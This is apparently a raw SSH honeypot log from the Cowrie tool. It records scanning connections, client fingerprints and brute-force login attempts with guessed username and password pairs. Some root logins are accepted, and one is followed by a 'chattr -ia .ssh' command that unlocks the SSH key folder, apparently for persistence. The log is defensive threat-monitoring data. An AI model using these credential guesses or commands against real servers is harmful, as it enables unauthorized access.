{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T10:23:12.894843Z","src_ip":"80.94.95.15","session":"a2e82c3fa982"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:23:13.948191Z","src_ip":"80.94.95.15","session":"a2e82c3fa982"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53380,"dst_ip":"1.2.3.4","dst_port":22,"session":"566d600eac5d","protocol":"ssh","message":"New connection: 217.72.205.35:53380 (1.2.3.4:22) [session: 566d600eac5d]","sensor":"my-vps","timestamp":"2025-08-28T10:24:23.458244Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:24:23.459394Z","src_ip":"217.72.205.35","session":"566d600eac5d"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":42230,"dst_ip":"1.2.3.4","dst_port":22,"session":"3eabe5c65871","protocol":"ssh","message":"New connection: 80.94.95.15:42230 (1.2.3.4:22) [session: 3eabe5c65871]","sensor":"my-vps","timestamp":"2025-08-28T10:24:26.058630Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T10:24:26.059534Z","src_ip":"80.94.95.15","session":"3eabe5c65871"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T10:24:26.111610Z","src_ip":"80.94.95.15","session":"3eabe5c65871"}
{"eventid":"cowrie.login.failed","username":"sammy","password":"sammy","message":"login attempt [sammy/sammy] failed","sensor":"my-vps","timestamp":"2025-08-28T10:24:26.396475Z","src_ip":"80.94.95.15","session":"3eabe5c65871"}
{"eventid":"cowrie.login.failed","username":"sammy","password":"abc123","message":"login attempt [sammy/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T10:24:27.449655Z","src_ip":"80.94.95.15","session":"3eabe5c65871"}
{"eventid":"cowrie.login.failed","username":"sammy","password":"abcd123","message":"login attempt [sammy/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T10:24:28.502501Z","src_ip":"80.94.95.15","session":"3eabe5c65871"}
{"eventid":"cowrie.login.failed","username":"sammy","password":"abcd1234","message":"login attempt [sammy/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T10:24:29.556548Z","src_ip":"80.94.95.15","session":"3eabe5c65871"}
{"eventid":"cowrie.login.failed","username":"sammy","password":"abc1234","message":"login attempt [sammy/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T10:24:30.610587Z","src_ip":"80.94.95.15","session":"3eabe5c65871"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:24:31.664035Z","src_ip":"80.94.95.15","session":"3eabe5c65871"}
{"eventid":"cowrie.session.connect","src_ip":"116.198.207.211","src_port":56950,"dst_ip":"1.2.3.4","dst_port":22,"session":"59f4b1d77b07","protocol":"ssh","message":"New connection: 116.198.207.211:56950 (1.2.3.4:22) [session: 59f4b1d77b07]","sensor":"my-vps","timestamp":"2025-08-28T10:27:30.650082Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:27:30.651028Z","src_ip":"116.198.207.211","session":"59f4b1d77b07"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:27:30.850634Z","src_ip":"116.198.207.211","session":"59f4b1d77b07"}
{"eventid":"cowrie.session.closed","duration":"120.1","message":"Connection lost after 120.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:29:30.705492Z","src_ip":"116.198.207.211","session":"59f4b1d77b07"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":65522,"dst_ip":"1.2.3.4","dst_port":22,"session":"566495f94a0f","protocol":"ssh","message":"New connection: 212.227.125.160:65522 (1.2.3.4:22) [session: 566495f94a0f]","sensor":"my-vps","timestamp":"2025-08-28T10:29:35.034090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-28T10:29:36.451108Z","src_ip":"212.227.125.160","session":"566495f94a0f"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-28T10:29:37.793355Z","src_ip":"212.227.125.160","session":"566495f94a0f"}
{"eventid":"cowrie.session.closed","duration":"9.9","message":"Connection lost after 9.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:29:44.918340Z","src_ip":"212.227.125.160","session":"566495f94a0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":2945,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b7f96a20a86","protocol":"ssh","message":"New connection: 212.227.235.229:2945 (1.2.3.4:22) [session: 8b7f96a20a86]","sensor":"my-vps","timestamp":"2025-08-28T10:30:32.124683Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:30:32.392848Z","src_ip":"212.227.235.229","session":"8b7f96a20a86"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:30:32.695632Z","src_ip":"212.227.235.229","session":"8b7f96a20a86"}
{"eventid":"cowrie.login.success","username":"root","password":"0987654321%%%","message":"login attempt [root/0987654321%%%] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:30:34.574017Z","src_ip":"212.227.235.229","session":"8b7f96a20a86"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:30:35.554514Z","src_ip":"212.227.235.229","session":"8b7f96a20a86"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T10:30:35.555250Z","src_ip":"212.227.235.229","session":"8b7f96a20a86"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:30:36.092906Z","src_ip":"212.227.235.229","session":"8b7f96a20a86"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:30:36.419571Z","src_ip":"212.227.235.229","session":"8b7f96a20a86"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52926,"dst_ip":"1.2.3.4","dst_port":22,"session":"5314a811fcd0","protocol":"ssh","message":"New connection: 217.72.205.35:52926 (1.2.3.4:22) [session: 5314a811fcd0]","sensor":"my-vps","timestamp":"2025-08-28T10:30:57.382612Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:30:57.383898Z","src_ip":"217.72.205.35","session":"5314a811fcd0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60023,"dst_ip":"1.2.3.4","dst_port":22,"session":"385744490f3a","protocol":"ssh","message":"New connection: 212.227.235.229:60023 (1.2.3.4:22) [session: 385744490f3a]","sensor":"my-vps","timestamp":"2025-08-28T10:30:59.095115Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:30:59.237601Z","src_ip":"212.227.235.229","session":"385744490f3a"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":34778,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc2dd4be545f","protocol":"ssh","message":"New connection: 80.94.95.112:34778 (1.2.3.4:22) [session: fc2dd4be545f]","sensor":"my-vps","timestamp":"2025-08-28T10:31:50.473376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T10:31:50.474264Z","src_ip":"80.94.95.112","session":"fc2dd4be545f"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T10:31:50.504476Z","src_ip":"80.94.95.112","session":"fc2dd4be545f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"alex1","message":"login attempt [admin/alex1] failed","sensor":"my-vps","timestamp":"2025-08-28T10:31:50.711489Z","src_ip":"80.94.95.112","session":"fc2dd4be545f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"akasha","message":"login attempt [admin/akasha] failed","sensor":"my-vps","timestamp":"2025-08-28T10:31:51.743993Z","src_ip":"80.94.95.112","session":"fc2dd4be545f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"agatha","message":"login attempt [admin/agatha] failed","sensor":"my-vps","timestamp":"2025-08-28T10:31:52.778514Z","src_ip":"80.94.95.112","session":"fc2dd4be545f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ace123","message":"login attempt [admin/ace123] failed","sensor":"my-vps","timestamp":"2025-08-28T10:31:53.810503Z","src_ip":"80.94.95.112","session":"fc2dd4be545f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57518,"dst_ip":"1.2.3.4","dst_port":22,"session":"a285cebc7775","protocol":"ssh","message":"New connection: 212.227.235.229:57518 (1.2.3.4:22) [session: a285cebc7775]","sensor":"my-vps","timestamp":"2025-08-28T10:31:54.752091Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:31:54.752748Z","src_ip":"212.227.235.229","session":"a285cebc7775"}
{"eventid":"cowrie.login.failed","username":"admin","password":"abstract","message":"login attempt [admin/abstract] failed","sensor":"my-vps","timestamp":"2025-08-28T10:31:54.842580Z","src_ip":"80.94.95.112","session":"fc2dd4be545f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:31:54.996656Z","src_ip":"212.227.235.229","session":"a285cebc7775"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:31:55.874585Z","src_ip":"80.94.95.112","session":"fc2dd4be545f"}
{"eventid":"cowrie.login.success","username":"root","password":"asd123!@#","message":"login attempt [root/asd123!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:31:56.020389Z","src_ip":"212.227.235.229","session":"a285cebc7775"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:31:56.525796Z","src_ip":"212.227.235.229","session":"a285cebc7775"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T10:31:56.526516Z","src_ip":"212.227.235.229","session":"a285cebc7775"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T10:31:56.527370Z","src_ip":"212.227.235.229","session":"a285cebc7775"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:31:56.772690Z","src_ip":"212.227.235.229","session":"a285cebc7775"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60482,"dst_ip":"1.2.3.4","dst_port":22,"session":"e199db187890","protocol":"ssh","message":"New connection: 212.227.235.229:60482 (1.2.3.4:22) [session: e199db187890]","sensor":"my-vps","timestamp":"2025-08-28T10:32:01.814851Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:32:01.953430Z","src_ip":"212.227.235.229","session":"e199db187890"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60492,"dst_ip":"1.2.3.4","dst_port":22,"session":"d95027e5f797","protocol":"ssh","message":"New connection: 212.227.235.229:60492 (1.2.3.4:22) [session: d95027e5f797]","sensor":"my-vps","timestamp":"2025-08-28T10:32:02.088699Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:32:02.089510Z","src_ip":"212.227.235.229","session":"d95027e5f797"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:32:02.226841Z","src_ip":"212.227.235.229","session":"d95027e5f797"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:32:02.366376Z","src_ip":"212.227.235.229","session":"d95027e5f797"}
{"eventid":"cowrie.session.connect","src_ip":"116.198.207.211","src_port":36512,"dst_ip":"1.2.3.4","dst_port":22,"session":"71568e617340","protocol":"ssh","message":"New connection: 116.198.207.211:36512 (1.2.3.4:22) [session: 71568e617340]","sensor":"my-vps","timestamp":"2025-08-28T10:32:45.377670Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:32:45.379935Z","src_ip":"116.198.207.211","session":"71568e617340"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:32:45.583234Z","src_ip":"116.198.207.211","session":"71568e617340"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"123456","message":"login attempt [mongodb/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T10:32:46.195125Z","src_ip":"116.198.207.211","session":"71568e617340"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62226,"dst_ip":"1.2.3.4","dst_port":22,"session":"5808018b72fc","protocol":"ssh","message":"New connection: 212.227.125.160:62226 (1.2.3.4:22) [session: 5808018b72fc]","sensor":"my-vps","timestamp":"2025-08-28T10:33:08.432850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T10:33:08.433738Z","src_ip":"212.227.125.160","session":"5808018b72fc"}
